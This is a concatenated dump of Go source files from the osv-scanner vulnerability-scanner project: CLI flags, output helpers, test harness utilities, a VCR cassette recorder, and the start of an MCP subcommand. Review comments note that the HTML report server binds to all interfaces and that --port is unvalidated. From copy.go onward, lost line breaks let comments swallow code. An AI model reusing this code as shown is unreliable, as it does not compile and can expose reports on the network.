// defaultExtractors becomes the default value of --experimental-plugins.
func BuildCommonScanFlags(defaultExtractors []string) []cli.Flag {
	return []cli.Flag{
		&cli.StringFlag{
			Name:      "config",
			Usage:     "set/override config file",
			TakesFile: true,
		},
		&cli.StringFlag{
			Name:    "format",
			Aliases: []string{"f"},
			Usage:   "sets the output format; value can be: " + strings.Join(reporter.Format(), ", "),
			Value:   "table",
			// Reject any value that is not one of the reporter's formats.
			Action: func(_ context.Context, _ *cli.Command, s string) error {
				if slices.Contains(reporter.Format(), s) {
					return nil
				}

				return fmt.Errorf("unsupported output format \"%s\" - must be one of: %s", s, strings.Join(reporter.Format(), ", "))
			},
			// todo: ideally this should be an action, but we need to ensure it is done first
			// currently for some reason flag actions are not always invoked in the same order
			//
			// For every known format other than vertical, table and markdown, all
			// log output is sent to stderr.
			Validator: func(s string) error {
				if slices.Contains(reporter.Format(), s) && (s != "vertical" && s != "table" && s != "markdown") {
					cmdlogger.SendEverythingToStderr()
				}

				return nil
			},
		},
		&cli.BoolFlag{
			Name:  "serve",
			Usage: "output as HTML result and serve it locally",
		},
		&cli.StringFlag{
			Name:  "port",
			Usage: "port number to use when serving HTML report (default: 8000)",
			// NOTE(review): the value is stored in the package-level servePort as
			// given; nothing here checks that it is a numeric port before ServeHTML
			// concatenates it into the listen address.
			Action: func(_ context.Context, _ *cli.Command, p string) error {
				servePort = p
				return nil
			},
		},
		&cli.StringFlag{
			Name:      "output",
			Usage:     "[DEPRECATED] (Use \"--output-file\" instead) saves the result to the given file path",
			TakesFile: true,
			Action: func(_ context.Context, _ *cli.Command, _ string) error {
				cmdlogger.Warnf("Warning: --output has been deprecated in favor of --output-file")
				return nil
			},
		},
		&cli.StringFlag{
			Name:      "output-file",
			Usage:     "saves the result to the given file path",
			TakesFile: true,
		},
		&cli.StringFlag{
			Name:  "verbosity",
			Usage: "specify the level of information that should be provided during runtime; value can be: " + strings.Join(cmdlogger.Levels(), ", "),
			Value: "info",
			Action: func(_ context.Context, _ *cli.Command, s string) error {
				lvl, err := cmdlogger.ParseLevel(s)

				if err != nil {
					return err
				}

				cmdlogger.SetLevel(lvl)

				return nil
			},
		},
		&cli.BoolFlag{
			Name:  "offline",
			Usage: "run in offline mode, disabling any features requiring network access",
			// When set, every flag listed in offlineFlags that the current command
			// defines is forced to its offline value; this overrides a value the
			// user gave explicitly (see the TODO below).
			Action: func(_ context.Context, cmd *cli.Command, b bool) error {
				if !b {
					return nil
				}
				// Disable the features requiring network access.
				for flag, value := range offlineFlags {
					// TODO(michaelkedar): do something if the flag was already explicitly set.

					// Skip setting the flag if the current command doesn't have it.
					if !slices.ContainsFunc(cmd.Flags, func(f cli.Flag) bool {
						return slices.Contains(f.Names(), flag)
					}) {
						continue
					}

					if err := cmd.Set(flag, value); err != nil {
						panic(fmt.Sprintf("failed setting offline flag %s to %s: %v", flag, value, err))
					}
				}

				return nil
			},
		},
		&cli.BoolFlag{
			Name:  "offline-vulnerabilities",
			Usage: "checks for vulnerabilities using local databases that are already cached",
		},
		&cli.BoolFlag{
			Name:  "download-offline-databases",
			Usage: "downloads vulnerability databases for offline comparison",
		},
		&cli.StringFlag{
			Name:   "local-db-path",
			Usage:  "sets the path that local databases should be stored",
			Hidden: true,
		},
		// Per the usage text, rust call analysis runs build scripts, i.e. code
		// taken from the tree being scanned; weigh that before enabling it on
		// sources you do not trust.
		&cli.StringSliceFlag{
			Name:  "call-analysis",
			Usage: "Enable call analysis for specific languages (e.g. --call-analysis=go). Supported: go, rust (*). (*) Will run build scripts.",
		},
		&cli.StringSliceFlag{
			Name:  "no-call-analysis",
			Usage: "disables call graph analysis",
		},
		&cli.BoolFlag{
			Name:  "no-resolve",
			Usage: "disable transitive dependency resolution of manifest files",
		},
		&cli.BoolFlag{
			Name:  "allow-no-lockfiles",
			Usage: "has the scanner consider no lockfiles being found as ok",
		},
		&cli.BoolFlag{
			Name:  "all-packages",
			Usage: "when json output is selected, prints all packages",
		},
		&cli.BoolFlag{
			Name:  "all-vulns",
			Usage: "show all vulnerabilities including unimportant and uncalled ones",
		},
		&cli.GenericFlag{
			Name:  "licenses",
			Usage: "report on licenses based on an allowlist",
			Value: &allowedLicencesFlag{},
		},
		&cli.BoolFlag{
			Name:  "experimental-flag-deprecated-packages",
			Usage: "report if package versions are deprecated",
		},
		&cli.StringSliceFlag{
			Name:  "experimental-plugins",
			Usage: "list of specific plugins and presets of plugins to use",
			Value: defaultExtractors,
		},
		&cli.StringSliceFlag{
			Name:  "experimental-disable-plugins",
			Usage: "list of specific plugins and presets of plugins to not use",
		},
		&cli.BoolFlag{
			Name:  "experimental-no-default-plugins",
			Usage: "disable default plugins, instead using only those enabled by --experimental-plugins",
		},
	}
}

================================================
FILE: cmd/osv-scanner/internal/helper/getters.go
================================================
package helper

import (
	"fmt"
	"net/http"
	"strings"

	"github.com/google/osv-scanner/v2/internal/spdx"
	"github.com/google/osv-scanner/v2/pkg/osvscanner"
	"github.com/urfave/cli/v3"
)

// GetScanLicensesAllowlist returns the license allowlist given via --licenses.
//
// It returns an empty slice when the flag is not set or carries no list, and
// an error naming the offending entries when any entry is not recognized as an
// SPDX license. The SPDX check runs before the --offline check, so an invalid
// entry is rejected in offline mode too; with --offline the returned allowlist
// is empty.
func GetScanLicensesAllowlist(cmd *cli.Command) ([]string, error) {
	if !cmd.IsSet("licenses") {
		return []string{}, nil
	}

	allowlist := cmd.Generic("licenses").(*allowedLicencesFlag).allowlist

	if len(allowlist) == 0 {
		return []string{}, nil
	}

	if unrecognized := spdx.Unrecognized(allowlist); len(unrecognized) > 0 {
		return nil, fmt.Errorf("--licenses requires comma-separated spdx licenses. The following license(s) are not recognized as spdx: %s", strings.Join(unrecognized, ","))
	}

	if cmd.Bool("offline") {
		allowlist = []string{}
	}

	return allowlist, nil
}

// GetCommonScannerActions maps the common scan flags onto osvscanner.ScannerActions.
//
// NOTE(review): "include-git-root" is read here but is not among the flags
// built by BuildCommonScanFlags; presumably the subcommand defines it.
func GetCommonScannerActions(cmd *cli.Command, scanLicensesAllowlist []string) osvscanner.ScannerActions {
	callAnalysisStates := CreateCallAnalysisStates(cmd.StringSlice("call-analysis"), cmd.StringSlice("no-call-analysis"))

	return osvscanner.ScannerActions{
		IncludeGitRoot:        cmd.Bool("include-git-root"),
		ConfigOverridePath:    cmd.String("config"),
		ShowAllPackages:       cmd.Bool("all-packages"),
		ShowAllVulns:          cmd.Bool("all-vulns"),
		CompareOffline:        cmd.Bool("offline-vulnerabilities"),
		DownloadDatabases:     cmd.Bool("download-offline-databases"),
		LocalDBPath:           cmd.String("local-db-path"),
		ScanLicensesSummary:   cmd.IsSet("licenses"),
		ScanLicensesAllowlist: scanLicensesAllowlist,
		CallAnalysisStates:    callAnalysisStates,
	}
}

// GetExperimentalScannerActions maps the experimental flags and the given HTTP
// client onto osvscanner.ExperimentalScannerActions.
func GetExperimentalScannerActions(cmd *cli.Command, client *http.Client) osvscanner.ExperimentalScannerActions {
	return osvscanner.ExperimentalScannerActions{
		PluginsEnabled:    cmd.StringSlice("experimental-plugins"),
		PluginsDisabled:   cmd.StringSlice("experimental-disable-plugins"),
		PluginsNoDefaults: cmd.Bool("experimental-no-default-plugins"),
		HTTPClient:        client,
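FlagDeprecatedPackages: cmd.Bool("experimental-flag-deprecated-packages"),
	}
}

================================================
FILE: cmd/osv-scanner/internal/helper/misc.go
================================================
// Package helper provides helper functions for the osv-scanner CLI.
package helper

import (
	"fmt"
	"io"
	"net/http"
	"os"
	"time"

	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/reporter"
	"github.com/google/osv-scanner/v2/pkg/models"
	"golang.org/x/term"
)

// sets default port(8000) as a global variable
// The --port flag action overwrites it with the user-supplied value.
var (
	servePort = "8000" // default port
)

// ServeHTML serves the single HTML file for remote accessing.
// The program will keep running to serve the HTML report on localhost
// until the user manually terminates it (e.g. using Ctrl+C).
//
// outputPath is the report file to serve. The call blocks in ListenAndServe;
// when that returns, the error is logged and the function returns.
func ServeHTML(outputPath string) {
	localhostURL := fmt.Sprintf("http://localhost:%s/", servePort)
	cmdlogger.Infof("Serving HTML report at %s", localhostURL)
	cmdlogger.Infof("If you are accessing remotely, use the following SSH command:")
	cmdlogger.Infof("`ssh -L local_port:destination_server_ip:%s ssh_server_hostname`", servePort)

	// NOTE(review): Addr has no host part, so the listener accepts connections on
	// every network interface, not only loopback, while the log lines above
	// advertise localhost and suggest an SSH tunnel for remote access. Anyone who
	// can reach the port can read the report. Binding to a loopback address would
	// match the documented intent, but it also changes reachability (for example
	// when the port is published from a container), so confirm before changing.
	server := &http.Server{
		Addr: ":" + servePort,
		// The handler ignores the request path and always passes the fixed
		// outputPath to http.ServeFile, so a request cannot select another file.
		Handler: http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
			http.ServeFile(w, r, outputPath)
		}),
		ReadHeaderTimeout: 3 * time.Second,
	}
	if err := server.ListenAndServe(); err != nil {
		cmdlogger.Errorf("Failed to start server: %v", err)
	}
}

// PrintResult writes the scan results in the requested format.
//
// When outputPath is non-empty the file is created (truncating any existing
// file) and used in place of stdout; it is closed before PrintResult returns.
// Otherwise, if stdout is an *os.File, its terminal width is looked up and
// passed to the reporter; a width of 0 is used when the lookup fails. The
// "gh-annotations" format is always written to stderr.
//
// It returns an error when the output file cannot be created, when the
// reporter fails, or when closing the output file fails after an otherwise
// successful write.
func PrintResult(stdout, stderr io.Writer, outputPath, format string, diffVulns *models.VulnerabilityResults, showAllVulns bool) (err error) {
	termWidth := 0

	if outputPath != "" { // Output is definitely a file
		outFile, createErr := os.Create(outputPath)
		if createErr != nil {
			return fmt.Errorf("failed to create output file: %w", createErr)
		}
		// Close the file once the report has been written. A failed close can mean
		// the report is incomplete on disk, so report it unless an earlier error is
		// already being returned.
		defer func() {
			if closeErr := outFile.Close(); closeErr != nil && err == nil {
				err = fmt.Errorf("failed to close output file: %w", closeErr)
			}
		}()
		stdout = outFile
	} else if stdoutAsFile, ok := stdout.(*os.File); ok { // Output might be a terminal
		width, _, sizeErr := term.GetSize(int(stdoutAsFile.Fd()))
		if sizeErr == nil {
			termWidth = width
		}
		// If output is not a terminal, termWidth stays 0
	}

	writer := stdout
	if format == "gh-annotations" {
		writer = stderr
	}

	return reporter.PrintResult(diffVulns, format, writer, termWidth, showAllVulns)
}

================================================
FILE: cmd/osv-scanner/internal/testcmd/case.go
================================================
// Package testcmd provides utilities for testing osv-scanner CLI commands.
package testcmd

import (
	"net/http"
	"strings"

	"github.com/google/osv-scanner/v2/internal/testutility"
)

// Case describes one CLI invocation under test: its arguments, the exit code
// it is expected to return, and optional JSON normalization rules and HTTP client.
type Case struct {
	Name string
	Args []string
	Exit int

	// ReplaceRules are only used for JSON output
	ReplaceRules []testutility.JSONReplaceRule

	HTTPClient *http.Client
}

// findFirstValueOfFlag returns the value of the first instance of the given flag
// in the test case arguments, if it is present at all
//
// Both the "flag=value" and "flag value" forms are recognized. An empty string
// is returned when the flag is absent or is the last argument with no value
// after it.
func (c Case) findFirstValueOfFlag(f string) string {
	for i, arg := range c.Args {
		if after, ok := strings.CutPrefix(arg, f+"="); ok {
			return after
		}
		// The value is the next argument, so it must exist: checking i+1 (not i)
		// against the length avoids indexing past the end when the flag is last.
		if arg == f && i+1 < len(c.Args) {
			return c.Args[i+1]
		}
	}

	return ""
}

================================================
FILE: cmd/osv-scanner/internal/testcmd/copy.go
================================================
package testcmd

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
	"testing"
)

// copyFile reads the whole of from and writes it to to with mode 0600,
// returning the destination path on success.
func copyFile(from, to string) (string, error) {
	b, err := os.ReadFile(from)
	if err != nil {
		return "", fmt.Errorf("could not read test file: %w", err)
	}

	if err := os.WriteFile(to, b, 0600); err != nil {
		return "", fmt.Errorf("could not copy test file: %w", err)
	}

	return to, nil
}

// CopyFileFlagTo creates a copy of the file pointed to by the given flag (if present
// in the test case arguments) in the given directory, updating all references
// in the arguments before returning the new path.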
// // Values that include "does_not_exist" are assumed to be for testing when the // flag is given the path to a file or directory that does not exist, and so // are ignored as if the flag was not given a value at all func CopyFileFlagTo(t *testing.T, tc Case, flagName string, dir string) string { t.Helper() flagValue := tc.findFirstValueOfFlag(flagName) if flagValue == "" || strings.Contains(flagValue, "does_not_exist") { return "" } newPath, err := copyFile(flagValue, filepath.Join(dir, filepath.Base(flagValue))) if err != nil { t.Fatalf("%v", err) } for i := range tc.Args { tc.Args[i] = strings.ReplaceAll(tc.Args[i], flagValue, newPath) } return newPath } ================================================ FILE: cmd/osv-scanner/internal/testcmd/git.go ================================================ package testcmd import ( "io/fs" "os" "path/filepath" "github.com/go-git/go-git/v5" ) func SetupGitFixtures() (func(), error) { // ensure a git repository doesn't already exist in the testdata directory, // in case we didn't get a chance to clean-up properly in the last run os.RemoveAll("./testdata/.git") toRemove := []string{"./testdata/.git"} cleaner := func() { for _, p := range toRemove { os.RemoveAll(p) } } // temporarily make the testdata folder a git repository to prevent gitignore files messing with tests _, err := git.PlainInit("./testdata", false) if err != nil { return cleaner, err } var gitIgnoreFiles []string // walk the testdata to find all test .gitignore files that should be copied before tests run err = filepath.Walk("./testdata", func(path string, info fs.FileInfo, err error) error { if err == nil && !info.IsDir() && filepath.Base(path) == "test.gitignore" { gitIgnoreFiles = append(gitIgnoreFiles, path) } return nil }) if err != nil { return cleaner, err } for _, f := range gitIgnoreFiles { gitignoreFile, err := copyFile(f, filepath.Join(filepath.Dir(f), ".gitignore")) if err != nil { return cleaner, err } toRemove = append(toRemove, gitignoreFile) } 
return cleaner, nil } ================================================ FILE: cmd/osv-scanner/internal/testcmd/run.go ================================================ package testcmd import ( "bytes" "context" "encoding/json" "errors" "fmt" "io" "net/http" "sort" "strings" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/internal/cachedregexp" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/urfave/cli/v3" ) // CommandsUnderTest should be set in TestMain by every cmd package test var CommandsUnderTest []cmd.CommandBuilder // fetchCommandsToTest returns the commands that should be tested, ensuring that // the default "scan" command is included to avoid a panic func fetchCommandsToTest() []cmd.CommandBuilder { for _, builder := range CommandsUnderTest { command := builder(nil, nil, nil) if command.Name == "scan" { return CommandsUnderTest } } return append(CommandsUnderTest, func(_, _ io.Writer, _ *http.Client) *cli.Command { return &cli.Command{ Name: "scan", Action: func(_ context.Context, _ *cli.Command) error { return errors.New("") }, } }) } func run(t *testing.T, tc Case) (string, string) { t.Helper() stdout := &bytes.Buffer{} stderr := &bytes.Buffer{} ec := cmd.Run(tc.Args, stdout, stderr, tc.HTTPClient, fetchCommandsToTest()) if ec != tc.Exit { t.Errorf("cli exited with code %d, not %d", ec, tc.Exit) t.Errorf("stdout: %s", stdout.String()) t.Errorf("stderr: %s", stderr.String()) } return stdout.String(), stderr.String() } func RunAndNormalize(t *testing.T, tc Case) (string, string) { t.Helper() stdout, stderr := run(t, tc) stdout = normalizeDirScanOrder(t, stdout) stderr = normalizeDirScanOrder(t, stderr) if len(tc.ReplaceRules) > 0 { if len(stdout) == 0 || !json.Valid([]byte(stdout)) { t.Fatalf("invalid JSON when expecting json\n stdout: %s\n stderr: %s", stdout, stderr) } stdout = normalizeJSON(t, stdout, tc.ReplaceRules...) 
} stdout = normalizeUUID(t, stdout) return stdout, stderr } func RunAndMatchSnapshots(t *testing.T, tc Case) { t.Helper() stdout, stderr := RunAndNormalize(t, tc) testutility.NewSnapshot().MatchText(t, stdout) testutility.NewSnapshot().WithWindowsReplacements(map[string]string{ "CreateFile": "stat", }).MatchText(t, stderr) } // normalizeJSON runs the given JSONReplaceRules on the given JSON input and returns the normalized JSON string func normalizeJSON(t *testing.T, jsonInput string, jsonReplaceRules ...testutility.JSONReplaceRule) string { t.Helper() for _, rule := range jsonReplaceRules { jsonInput = testutility.ReplaceJSONInput(t, jsonInput, rule.Path, rule.ReplaceFunc) } jsonFormatted := bytes.Buffer{} err := json.Indent(&jsonFormatted, []byte(jsonInput), "", " ") if err != nil { t.Fatalf("Failed to marshal JSON: %s", err) } return jsonFormatted.String() } // Sorts the output between directory scan markers to allow for consistent test results when doing unsorted dir walks func normalizeDirScanOrder(t *testing.T, input string) string { t.Helper() inputLines := strings.Split(input, "\n") var completeOutput = make([]string, 0, len(inputLines)) var dirScanHolder []string printingDirScanLogs := false for _, line := range inputLines { if strings.Contains(line, testlogger.BeginDirectoryScan) { if printingDirScanLogs { t.Fatalf("directory scan began twice before finishing?") } printingDirScanLogs = true continue } if strings.Contains(line, testlogger.EndDirectoryScan) { if !printingDirScanLogs { t.Fatalf("directory scan ended before starting?") } printingDirScanLogs = false sort.Strings(dirScanHolder) completeOutput = append(completeOutput, dirScanHolder...) 
dirScanHolder = nil continue } if printingDirScanLogs { dirScanHolder = append(dirScanHolder, line) continue } completeOutput = append(completeOutput, line) } return strings.Join(completeOutput, "\n") } // normalizeUUID normalizes each unique instance of uuid string into it's own placeholder, so relations are preserved. func normalizeUUID(t *testing.T, input string) string { t.Helper() uuidV4Regexp := cachedregexp.MustCompile( "[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-4[0-9a-fA-F]{3}-[89ABab][0-9a-fA-F]{3}-[0-9a-fA-F]{12}") uuidMapping := map[string]int{} allUUIDs := uuidV4Regexp.FindAllString(input, -1) for _, id := range allUUIDs { if _, ok := uuidMapping[id]; ok { continue } // Create a incrementing uuid mapping for each unique uuid we encounter uuidMapping[id] = len(uuidMapping) } replacerRules := make([]string, 0, len(uuidMapping)*2) for s, i := range uuidMapping { replacerRules = append(replacerRules, s, fmt.Sprintf("uuid-placeholder-%d", i)) } return strings.NewReplacer(replacerRules...).Replace(input) } ================================================ FILE: cmd/osv-scanner/internal/testcmd/vcr.go ================================================ package testcmd import ( "bytes" "cmp" "fmt" "io" "net/http" "os" "path/filepath" "reflect" "slices" "strings" "testing" "github.com/tidwall/pretty" "go.yaml.in/yaml/v4" "gopkg.in/dnaeon/go-vcr.v4/pkg/cassette" "gopkg.in/dnaeon/go-vcr.v4/pkg/recorder" ) func determineRecorderMode() recorder.Mode { switch strings.ToLower(os.Getenv("TEST_VCR_MODE")) { case "recordonly", "0": return recorder.ModeRecordOnly case "replayonly", "1": return recorder.ModeReplayOnly case "replaywithnewepisodes", "2": return recorder.ModeReplayWithNewEpisodes case "recordonce", "3": return recorder.ModeRecordOnce case "passthrough", "4": return recorder.ModePassthrough } if _, inCI := os.LookupEnv("CI"); inCI { return recorder.ModeReplayOnly } return recorder.ModeReplayWithNewEpisodes } // withHeadersTripper adds extra headers to requests before they're 
done by the wrapped http.Client type withHeadersTripper struct { wrapper http.Client headers map[string]string } func (wht withHeadersTripper) RoundTrip(request *http.Request) (*http.Response, error) { for key, value := range wht.headers { request.Header.Set(key, value) } return wht.wrapper.Do(request) } var _ http.RoundTripper = withHeadersTripper{} // WithTestNameHeader wraps the given http.Client with an http.RoundTripper that // adds a custom header to every request with the name of the test being run func WithTestNameHeader(t *testing.T, client http.Client) *http.Client { t.Helper() return &http.Client{Transport: withHeadersTripper{ wrapper: client, headers: map[string]string{"X-Test-Name": t.Name()}, }} } // this is cassette.Interaction without its ID field type withoutID struct { Request cassette.Request `yaml:"request"` Response cassette.Response `yaml:"response"` } // custom marshaller to make cassettes pretty and to omit the "id" field from interactions // for a smaller diff since we don't care about their order func marshalCassettes(in any) (out []byte, err error) { cass, ok := in.(*cassette.Cassette) if !ok { return nil, fmt.Errorf("expected *cassette.Cassette, got %T", in) } interactions := make([]withoutID, len(cass.Interactions)) for i, interaction := range cass.Interactions { interactions[i] = withoutID{ Request: interaction.Request, Response: interaction.Response, } } input := struct { Version int `yaml:"version"` Interactions []withoutID `yaml:"interactions"` }{Version: cass.Version, Interactions: interactions} var buf bytes.Buffer enc := yaml.NewEncoder(&buf) enc.SetIndent(2) if err := enc.Encode(input); err != nil { return nil, err } return buf.Bytes(), nil } // InsertCassette returns an http.Client backed by a [recorder.Recorder] which // will record and (re)play responses from a cassette based on the tests name func InsertCassette(t *testing.T) *http.Client { t.Helper() path := filepath.Join("testdata/cassettes", strings.ReplaceAll(t.Name(), 
"/", "_")) r, err := recorder.New( path, recorder.WithMarshalFunc(marshalCassettes), recorder.WithSkipRequestLatency(true), recorder.WithMode(determineRecorderMode()), recorder.WithPassthrough(func(req *http.Request) bool { // exclude requests for info on a specific vuln since they can be quite large // and their changes should be less impactful to our snapshots than the query // endpoint, as those reqs are what results in specific vulns being looked up return strings.HasPrefix(req.URL.Path, "/v1/vulns/") }), recorder.WithMatcher(matcher), recorder.WithHook(func(i *cassette.Interaction) error { // remove headers that are not important to reduce cassette size and noise for _, header := range []string{ "Alt-Svc", "Grpc-Accept-Encoding", "Grpc-Message", "Grpc-Status", "Server", "Traceparent", "X-Cloud-Trace-Context", "X-Envoy-Decorator-Operation", "Date", } { delete(i.Response.Headers, header) } for header := range i.Response.Headers { if strings.HasPrefix(header, "X-Google-") { delete(i.Response.Headers, header) } } delete(i.Request.Headers, "User-Agent") // Force copy of default options, as we don't want to change the global variable prettyOptions := *pretty.DefaultOptions prettyOptions.SortKeys = true i.Request.Body = string(pretty.PrettyOptions([]byte(i.Request.Body), &prettyOptions)) i.Request.ContentLength = int64(len(i.Request.Body)) // use a static duration since we don't care about replicating latency i.Response.Duration = 0 i.Response.Body = string(pretty.PrettyOptions([]byte(i.Response.Body), &prettyOptions)) return nil }, recorder.AfterCaptureHook), ) if err != nil { t.Fatal(err) } t.Cleanup(func() { if err := r.Stop(); err != nil { t.Error(err) } sortCassetteInteractions(t, path) }) return r.GetDefaultClient() } // sortCassetteInteractions reorders the interactions in the given cassette, based // on the X-Test-Name header to help reduce the diff when interactions are changed func sortCassetteInteractions(t *testing.T, path string) { t.Helper() cass, err 
:= cassette.Load(strings.TrimSuffix(path, ".yaml")) if err != nil { t.Fatalf("failed to load %s: %v", path, err) } cass.MarshalFunc = marshalCassettes // we don't need to worry about the interaction ids as they get updated as part of saving slices.SortFunc(cass.Interactions, func(a, b *cassette.Interaction) int { return cmp.Compare(a.Request.Headers.Get("X-Test-Name"), b.Request.Headers.Get("X-Test-Name")) }) if err = cass.Save(); err != nil { t.Fatalf("failed to write %s: %v", path, err) } } // Simplified matcher, which only looks at: // - Method // - URL // - Headers // - Body func matcher(r *http.Request, i cassette.Request) bool { if r.Method != i.Method { return false } if r.URL.String() != i.URL { return false } requestHeader := r.Header.Clone() cassetteRequestHeaders := i.Headers.Clone() for _, header := range []string{ "User-Agent", "Content-Length", } { delete(requestHeader, header) delete(cassetteRequestHeaders, header) } if !reflect.DeepEqual(requestHeader, cassetteRequestHeaders) { return false } if !matchBody(r, i) { return false } return true } func matchBody(r *http.Request, i cassette.Request) bool { if r.Body != nil { var buffer bytes.Buffer if _, err := buffer.ReadFrom(r.Body); err != nil { return false } r.Body = io.NopCloser(bytes.NewBuffer(buffer.Bytes())) if !bytes.Equal( pretty.PrettyOptions(buffer.Bytes(), &pretty.Options{SortKeys: true}), pretty.PrettyOptions([]byte(i.Body), &pretty.Options{SortKeys: true}), ) { return false } } else if len(i.Body) != 0 { return false } return true } ================================================ FILE: cmd/osv-scanner/main.go ================================================ package main import ( "os" "github.com/google/osv-scanner/v2/cmd/osv-scanner/fix" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/mcp" "github.com/google/osv-scanner/v2/cmd/osv-scanner/scan" "github.com/google/osv-scanner/v2/cmd/osv-scanner/update" ) func main() { 
os.Exit( cmd.Run(os.Args, os.Stdout, os.Stderr, nil, []cmd.CommandBuilder{ scan.Command, fix.Command, update.Command, mcp.Command, }), ) } ================================================ FILE: cmd/osv-scanner/main_test.go ================================================ // main cannot be accessed directly, so cannot use main_test package main import ( "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" ) //nolint:paralleltest func Test_run(t *testing.T) { tests := []testcmd.Case{ { Name: "", Args: []string{""}, Exit: 127, }, { Name: "", Args: []string{"--help"}, Exit: 127, }, { Name: "version", Args: []string{"", "--version"}, Exit: 0, }, } // No parallel because --version output is not thread safe. for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { testcmd.RunAndMatchSnapshots(t, tt) }) } } func Test_run_SubCommands(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ // without subcommands { Name: "with_no_subcommand", Args: []string{"", "./testdata/locks-many/composer.lock"}, Exit: 0, }, // with scan subcommand { Name: "with_scan_subcommand", Args: []string{"", "scan", "./testdata/locks-many/composer.lock"}, Exit: 0, }, // scan with a flag { Name: "scan_with_a_flag", Args: []string{"", "scan", "--recursive", "./testdata/locks-one-with-nested"}, Exit: 0, }, // TODO: add tests for other future subcommands } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } ================================================ FILE: cmd/osv-scanner/mcp/__snapshots__/integration_test.snap ================================================ [TestIntegration_MCP_SSE_Subprocess/GetVulnerabilityDetails - 1] { "content": [ { "type": "text", "text": "{\n \"schema_version\": \"1.7.3\",\n \"id\": \"GO-2023-1558\",\n \"published\": \"2023-02-14T19:41:21Z\",\n \"modified\": \"2024-05-20T16:03:47Z\",\n 
\"aliases\": [\"CVE-2023-23626\", \"GHSA-2h6c-j3gf-xp9r\"],\n \"summary\": \"Denial of service via malformed size parameters in github.com/ipfs/go-bitfield\",\n \"details\": \"When feeding untrusted user input into the size parameter of NewBitfield and FromBytes functions, an attacker can trigger panics.\\n\\nThis happens when the size is a not a multiple of 8 or is negative.\\n\\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.\",\n \"affected\": [\n {\n \"package\": {\n \"name\": \"github.com/ipfs/go-bitfield\",\n \"ecosystem\": \"Go\",\n \"purl\": \"pkg:golang/github.com/ipfs/go-bitfield\"\n },\n \"ranges\": [\n {\n \"type\": \"SEMVER\",\n \"events\": [\n {\n \"introduced\": \"0\"\n },\n {\n \"fixed\": \"1.1.0\"\n }\n ]\n }\n ],\n \"ecosystem_specific\": {\n \"imports\": [\n {\n \"path\": \"github.com/ipfs/go-bitfield\",\n \"symbols\": [\"FromBytes\", \"NewBitfield\"]\n }\n ]\n },\n \"database_specific\": {\n \"source\": \"https://vuln.go.dev/ID/GO-2023-1558.json\"\n }\n }\n ],\n \"references\": [\n {\n \"type\": \"ADVISORY\",\n \"url\": \"https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r\"\n },\n {\n \"type\": \"FIX\",\n \"url\": \"https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\"\n }\n ],\n \"database_specific\": {\n \"review_status\": \"REVIEWED\",\n \"url\": \"https://pkg.go.dev/vuln/GO-2023-1558\"\n },\n \"credits\": [\n {\n \"name\": \"Jorropo\"\n }\n ]\n}\n" } ] } --- [TestIntegration_MCP_SSE_Subprocess/ScanVulnerableDependencies - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. 
Go lockfile:/testdata/go-project/go.mod: found 1 package with issues github.com/ipfs/go-bitfield@1.0.0 has the following known vulnerabilities: GO-2023-1558: Denial of service via malformed size parameters in github.com/ipfs/go-bitfield Severity: '5.9'; Minimal Fix Version: '1.1.0'; 1 known vulnerability found in lockfile:/testdata/go-project/go.mod Hiding 9 number of vulnerabilities deemed unimportant, use --all-vulns to show them. --- ================================================ FILE: cmd/osv-scanner/mcp/command.go ================================================ // Package mcp implements the `mcp` command for osv-scanner. package mcp import ( "context" _ "embed" "errors" "fmt" "io" "strings" "sync" "time" "net/http" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/internal/version" "github.com/google/osv-scanner/v2/pkg/osvscanner" "github.com/jedib0t/go-pretty/v6/text" "github.com/modelcontextprotocol/go-sdk/mcp" "github.com/ossf/osv-schema/bindings/go/osvschema" "github.com/tidwall/pretty" "github.com/urfave/cli/v3" "google.golang.org/protobuf/encoding/protojson" "osv.dev/bindings/go/osvdev" ) var ( vulnCacheMu sync.RWMutex vulnCacheMap = make(map[string]*osvschema.Vulnerability) ) // Command is the entry point for the `mcp` subcommand. func Command(_, _ io.Writer, _ *http.Client) *cli.Command { return &cli.Command{ Name: "experimental-mcp", Usage: "Run osv-scanner as an MCP service (experimental)", Description: "Run osv-scanner as an MCP service, speaking the MCP protocol over stdin/stdout.", Flags: []cli.Flag{ &cli.StringFlag{ Name: "sse", DefaultText: "localhost:8080", Value: "localhost:8080", Usage: "The listening address for the SSE server, e.g. localhost:8080", }, }, Action: action, } } // scanVulnerableDependenciesInput is the input for the scan_vulnerable_dependencies tool. 
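type scanVulnerableDependenciesInput struct {
	// Paths are the files or directories to scan. They are chosen by the MCP
	// client and handed to the scanner unchanged in handleScan.
	Paths []string `json:"paths" jsonschema:"A list of absolute or relative path to a file or directory to scan."`
	// NOTE(review): this field is advertised in the tool schema, but handleScan
	// does not read it, so patterns sent by a client currently have no effect on
	// the scan. Wire it into the scanner options or remove it from the schema.
	IgnoreGlobPatterns []string `json:"ignore_glob_patterns" jsonschema:"A list of glob patterns to ignore when scanning."`
	// Recursive is passed through as ScannerActions.Recursive.
	Recursive bool `json:"recursive" jsonschema:"Scans directory recursively"`
}

// action builds the MCP server, registers its three tools and one prompt, and
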